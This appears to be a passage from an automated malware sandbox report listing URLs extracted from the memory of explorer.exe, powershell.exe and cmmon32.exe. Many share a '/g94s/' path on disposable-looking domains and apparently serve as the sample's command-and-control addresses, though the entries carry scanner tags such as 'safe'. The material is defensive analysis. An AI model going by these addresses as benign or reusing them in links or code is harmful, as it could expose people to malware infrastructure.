                                  		unknown
                                  http://www.krmq9w.cfdReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.styledinfaith.comexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.baroevent.com/g94s/www.brezop.xyzexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.lajzznhk.cfd/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.hyperpigmentation-91528.bond/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.latamgradoenenfermeria.com/g94s/www.styledinfaith.comexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.rixiojjl.cfd/g94s/www.krmq9w.cfdexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.brezop.xyzReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.latamgradoenenfermeria.com/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.justinwdong.comexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.xnmshx.cfd/g94s/www.93txm.liveexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.hyperpigmentation-91528.bond/g94s/www.rixiojjl.cfdexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.lojq5vh.buzz/g94s/www.justinwdong.comexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.electorhome.comexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.justinwdong.comReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.392901894.00000210915F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.electorhome.com/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.lajzznhk.cfd/g94s/www.latamgradoenenfermeria.comexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.rixiojjl.cfd/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.brezop.xyz/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.407299228.000000000F270000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.krmq9w.cfd/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.krmq9w.cfd/g94s/www.qsmdrkjw.cfdexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.yprblqkk.cfd/g94s/www.lojq5vh.buzzexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.lojq5vh.buzz/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.brezop.xyz/g94s/www.hyperpigmentation-91528.bondexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.qsmdrkjw.cfdReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.latamgradoenenfermeria.comReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.hyperpigmentation-91528.bondReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.lojq5vh.buzzexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.xnmshx.cfd/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groovexplorer.exe, 00000004.00000000.426945176.00007FFC1B439000.00000002.00000001.01000000.00000008.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.93txm.liveexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.yprblqkk.cfdexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.apinspect.netReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.93txm.live/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.latamgradoenenfermeria.comexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.baroevent.com/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://freswe.clickpowershell.exe, 00000001.00000002.392901894.0000021091AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.392901894.0000021091B10000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.styledinfaith.com/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.baroevent.comexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.rixiojjl.cfdexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.styledinfaith.com/g94s/www.xnmshx.cfdexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.krmq9w.cfdexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.electorhome.comReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.qsmdrkjw.cfd/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.lojq5vh.buzzReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.xnmshx.cfdexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.rixiojjl.cfdReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.apinspect.net/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.qsmdrkjw.cfdexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://dfltweb1.onamae.comcmmon32.exe, 00000007.00000002.902659095.0000000004F4F000.00000004.10000000.00040000.00000000.sdmpfalse
                                        		high
                                        http://www.apinspect.netexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.93txm.live/g94s/www.yprblqkk.cfdexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
